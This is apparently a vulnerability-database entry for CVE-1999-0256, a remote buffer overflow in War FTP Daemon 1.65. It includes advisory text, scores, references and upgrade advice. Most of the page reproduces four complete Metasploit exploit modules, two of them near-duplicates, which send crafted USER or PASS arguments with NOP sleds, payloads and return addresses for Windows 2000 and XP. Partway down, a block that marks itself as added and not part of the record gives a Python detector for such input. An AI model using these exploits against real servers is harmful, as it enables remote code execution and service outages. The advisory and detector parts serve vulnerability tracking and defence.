CVE-1999-0256
CVSS 7.5
Published: 1998-02-01 00:00:00
Revised: 2008-09-09 08:34:08

[Original] Buffer overflow in War FTP allows remote execution of commands.


[CNNVD] War FTPD USER/PASS command over-long argument buffer overflow vulnerability (CNNVD-199802-006)

        
        War FTP Daemon is an FTP server for 32-bit Windows platforms.
        War FTPD has a buffer overflow vulnerability when handling USER/PASS commands that carry over-long arguments; a remote attacker could exploit it to execute arbitrary instructions on the server and take control of it.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may lead to modification of system files]
Availability impact: PARTIAL [may lead to degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_95  Microsoft Windows 95
cpe:/a:jgaa:warftpd:1.66
cpe:/o:microsoft:windows_nt  Microsoft Windows NT

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0256
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0256
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199802-006
(official data source) CNNVD

- Other links and resources

http://www.osvdb.org/875
(UNKNOWN)  OSVDB  875

- Vulnerability information

War FTPD USER/PASS command over-long argument buffer overflow vulnerability
High risk  Other
1998-02-01 00:00:00 2005-05-02 00:00:00
Remote
        
        War FTP Daemon is an FTP server for 32-bit Windows platforms.
        War FTPD has a buffer overflow vulnerability when handling USER/PASS commands that carry over-long arguments; a remote attacker could exploit it to execute arbitrary instructions on the server and take control of it.

- Advisories and patches

        Vendor patch:
        Jarle Aase
        ----------
        The vendor has fixed this security issue in the latest version of the software; please download it from the vendor's home page:

        http://www.jgaa.com/warftpd.htm

- Vulnerability information (16706)

War-FTPD 1.65 Password Overflow (EDBID:16706)
windows remote
2010-07-03 Verified
0 metasploit
N/A
##
# $Id: warftpd_165_pass.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'War-FTPD 1.65 Password Overflow',
			'Description'    => %q{
					This exploits the buffer overflow found in the PASS command
				in War-FTPD 1.65. This particular module will only work
				reliably against Windows 2000 targets. The server must be
				configured to allow anonymous logins for this exploit to
				succeed. A failed attempt will bring down the service
				completely.
			},
			'Author'         => 'hdm',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'CVE', '1999-0256'],
					[ 'OSVDB', '875'    ],
					[ 'BID', '10078'	],
					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process'
				},
			'Payload'        =>
				{
					'Space'    => 424,
					'BadChars' => "\x00\x0a\x0d\x40",
					'StackAdjustment' => -3500,
					'Compat'   =>
						{
							'ConnectionType' => "-find"
						}
				},
			'Targets'        =>
				[
					# Target 0
					[
						'Windows 2000',
						{
							'Platform' => 'win',
							'Ret'      => 0x5f4e772b # jmp ebx in the included MFC42.DLL
						},
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 19 1998'))
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf          = make_nops(566) + payload.encoded
		buf[558, 2]  = "\xeb\x06"
		buf[562, 4]  = [ target.ret ].pack('V')

		# Send USER Command
		send_user(datastore['FTPUSER'])

		# Send PASS Command
		send_cmd(['PASS', buf], false)

		handler
		disconnect
	end

end
		

- Vulnerability information (16724)

War-FTPD 1.65 Username Overflow (EDBID:16724)
windows remote
2010-07-03 Verified
0 metasploit
N/A
##
# $Id: warftpd_165_user.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'War-FTPD 1.65 Username Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow found in the USER command
				of War-FTPD 1.65.
			},
			'Author'         => 'Fairuzan Roslan <riaf [at] mysec.org>',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'CVE', '1999-0256'],
					[ 'OSVDB', '875'    ],
					[ 'BID', '10078'	],
					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process'
				},
			'Payload'        =>
				{
					'Space'    => 424,
					'BadChars' => "\x00\x0a\x0d\x40",
					'StackAdjustment' => -3500,
					'Compat'   =>
						{
							'ConnectionType' => "-find"
						}
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Target 0
					[
						'Windows 2000 SP0-SP4 English',
						{
							'Ret'      => 0x750231e2 # ws2help.dll
						},
					],
					# Target 1
					[
						'Windows XP SP0-SP1 English',
						{
							'Ret'      => 0x71ab1d54 # push esp, ret
						}
					],
					# Target 2
					[
						'Windows XP SP2 English',
						{
							'Ret'      => 0x71ab9372 # push esp, ret
						}
					],
					# Target 3
					[
						'Windows XP SP3 English',
						{
							'Ret'      => 0x71ab2b53 # push esp, ret
						}
					]
				],
			'DisclosureDate' => 'Mar 19 1998'))
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf          = make_nops(600) + payload.encoded
		buf[485, 4]  = [ target.ret ].pack('V')

		send_cmd( ['USER', buf] , false )

		handler
		disconnect
	end

end
		

- Vulnerability information (F83063)

War-FTPD 1.65 Password Overflow (PacketStormID:F83063)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
windows,2k
CVE-1999-0256

This exploits the buffer overflow found in the PASS command in War-FTPD 1.65. This particular module will only work reliably against Windows 2000 targets. The server must be configured to allow anonymous logins for this exploit to succeed. A failed attempt will bring down the service completely.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'War-FTPD 1.65 Password Overflow',
			'Description'    => %q{
				This exploits the buffer overflow found in the PASS command
				in War-FTPD 1.65. This particular module will only work
				reliably against Windows 2000 targets. The server must be
				configured to allow anonymous logins for this exploit to
				succeed. A failed attempt will bring down the service
				completely.
			},
			'Author'         => 'hdm',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '1999-0256'],
					[ 'OSVDB', '875'    ],
					[ 'BID', '10078'	],
					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],
				],
			'DefaultOptions' => 
				{
					'EXITFUNC' => 'process'
				},
			'Payload'        =>
				{
					'Space'    => 424,
					'BadChars' => "\x00\x0a\x0d\x40",
					'StackAdjustment' => -3500,
					'Compat'   =>
						{
							'ConnectionType' => "-find"
						}
				},
			'Targets'        =>
				[
					# Target 0
					[
						'Windows 2000',
						{
							'Platform' => 'win',
							'Ret'      => 0x5f4e772b # jmp ebx in the included MFC42.DLL
						},
					],
				]))

	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf          = make_nops(566) + payload.encoded
		buf[558, 2]  = "\xeb\x06"
		buf[562, 4]  = [ target.ret ].pack('V')

		# Send USER Command
		send_user(datastore['FTPUSER'])

		# Send PASS Command
		send_cmd(['PASS', buf], false)

		handler
		disconnect
	end

end
    

- Vulnerability information (F82932)

War-FTPD 1.65 Username Overflow (PacketStormID:F82932)
2009-10-30 00:00:00
riaf  metasploit.com
exploit,overflow
CVE-1999-0256

This Metasploit module exploits a buffer overflow found in the USER command of War-FTPD 1.65.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'War-FTPD 1.65 Username Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow found in the USER command
				of War-FTPD 1.65.
			},
			'Author'         => 'Fairuzan Roslan <riaf [at] mysec.org>',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '1999-0256'],
					[ 'OSVDB', '875'    ],
					[ 'BID', '10078'	],
					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],
				],
			'DefaultOptions' => 
				{
					'EXITFUNC' => 'process'
				},
			'Payload'        =>
				{
					'Space'    => 424,
					'BadChars' => "\x00\x0a\x0d\x40",
					'StackAdjustment' => -3500,
					'Compat'   =>
						{
							'ConnectionType' => "-find"
						}
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Target 0
					[
						'Windows 2000 SP0-SP4 English',
						{
							'Ret'      => 0x750231e2 # ws2help.dll
						},
					],
					# Target 1
					[
						'Windows XP SP0-SP1 English',
						{
							'Ret'      => 0x71ab1d54 # push esp, ret
						}
					],
					# Target 2
					[
						'Windows XP SP2 English',
						{
							'Ret'      => 0x71ab9372 # push esp, ret
						}
					],
					# Target 3
					[
						'Windows XP SP3 English',
						{
							'Ret'      => 0x71ab2b53 # push esp, ret
						}
					]					
				]))
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf          = make_nops(600) + payload.encoded
		buf[485, 4]  = [ target.ret ].pack('V')

		send_cmd( ['USER', buf] , false )

		handler
		disconnect
	end

end
    

- Vulnerability information

875
WarFTPd USER/PASS Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- Vulnerability description

WarFTPD contains a flaw that allows a remote attacker to execute arbitrary code. The issue is due to improper bounds checking for the USER and PASS commands. If an attacker supplies a specially crafted request, they may be able to overflow the buffer and execute arbitrary code with the same privileges as the server.
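Added defender-side example (not part of this record, of War FTPD, or of the Metasploit modules reproduced above): a small Python checker that reads FTP control-channel lines, as captured from a proxy log or a decoded packet capture, and flags USER or PASS commands whose argument is over-long or mostly non-printable, which is the observable shape of the input this record describes. The 128-byte length threshold, the one-quarter non-printable ratio and the sample capture are constructed assumptions, not values taken from the product or the modules.

```python
"""Flag over-long or binary-looking FTP USER/PASS arguments in captured control-channel lines.

Added example for this record; the thresholds and the sample capture below are constructed
assumptions, not values taken from War FTPD or from the Metasploit modules.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Assumed threshold: real usernames and passwords are short, while the modules on this
# page send several hundred bytes in a single USER or PASS argument.
MAX_ARG_LEN = 128

# The two commands this record names as the overflow vector.
WATCHED_CMDS = {"USER", "PASS"}

# FTP command verbs are 3 or 4 letters followed by an optional space-separated argument.
_CMD_RE = re.compile(rb"^([A-Za-z]{3,4})(?: (.*))?$")


@dataclass
class Finding:
    line_no: int
    command: str
    arg_len: int
    nonprintable: int
    reason: str


def parse_command(raw: bytes) -> Optional[Tuple[str, bytes]]:
    """Split one client line into (VERB, argument bytes).

    Returns None for lines that are not commands, e.g. server replies such as
    b"220 ..." or b"331 ...", which begin with a numeric code.
    """
    line = raw.rstrip(b"\r\n")
    m = _CMD_RE.match(line)
    if m is None:
        return None
    verb = m.group(1).upper().decode("ascii")
    arg = m.group(2) or b""
    return verb, arg


def inspect_lines(lines: Iterable[bytes], max_arg_len: int = MAX_ARG_LEN) -> List[Finding]:
    """Return one Finding per USER/PASS line that looks like overflow input."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(lines, start=1):
        parsed = parse_command(raw)
        if parsed is None:
            continue
        verb, arg = parsed
        if verb not in WATCHED_CMDS:
            continue
        nonprintable = sum(1 for b in arg if b < 0x20 or b > 0x7E)
        reasons = []
        if len(arg) > max_arg_len:
            reasons.append(f"argument length {len(arg)} exceeds {max_arg_len}")
        # Assumed heuristic: more than a quarter non-printable bytes is not a credential.
        if nonprintable and nonprintable * 4 > len(arg):
            reasons.append(f"{nonprintable} non-printable bytes in argument")
        if reasons:
            findings.append(Finding(line_no, verb, len(arg), nonprintable, "; ".join(reasons)))
    return findings


# Constructed sample capture: a normal anonymous login followed by two hostile lines.
SAMPLE_LINES = [
    b"220 War FTP Daemon ready\r\n",
    b"USER anonymous\r\n",
    b"331 User name okay, need password\r\n",
    b"PASS guest@example.org\r\n",
    b"230 User logged in\r\n",
    b"USER " + b"A" * 600 + b"\r\n",      # over-long, printable filler
    b"PASS " + b"\x90" * 300 + b"\r\n",   # over-long and almost entirely non-printable
]


if __name__ == "__main__":
    for f in inspect_lines(SAMPLE_LINES):
        print(f"line {f.line_no}: {f.command} flagged ({f.reason})")
```

Run as a script it prints the two flagged lines from the sample; in practice feed it the client side of a control-channel capture. Because the module descriptions on this page state that a failed attempt brings the service down, pair this check with a service-availability alert on the FTP listener; the durable fix remains the vendor upgrade listed in the solution sections of this record.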

- Timeline

1998-03-19 Unknown
Unknown Unknown

- Solution

Upgrade to version 1.66x4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

WarFTP Username Stack-Based Buffer-Overflow Vulnerability
Boundary Condition Error 22944
Yes No
2007-03-13 12:00:00 2007-11-01 09:16:00
This issue was disclosed as part of the Immunity Partner's program.

- Affected program versions

War FTP Daemon WarFTP 1.65

- Vulnerability discussion

WarFTP is prone to a stack-based buffer-overflow vulnerability because it fails to properly check boundaries on user-supplied data before copying it to an insufficiently sized buffer.

Exploiting this issue could lead to denial-of-service conditions and to the execution of arbitrary machine code in the context of the application.

WarFTP 1.65 is vulnerable; other versions may also be affected.

- Exploit

The following exploit is available to members of the Immunity Partner's program:

https://www.immunityinc.com/downloads/immpartners/warftp_165.tar

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following exploits are also available:

- Solution

Reports indicate that the vendor fixed this issue in version 1.80. Please contact the vendor for more information.

- Related references

About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on the relevant MITRE websites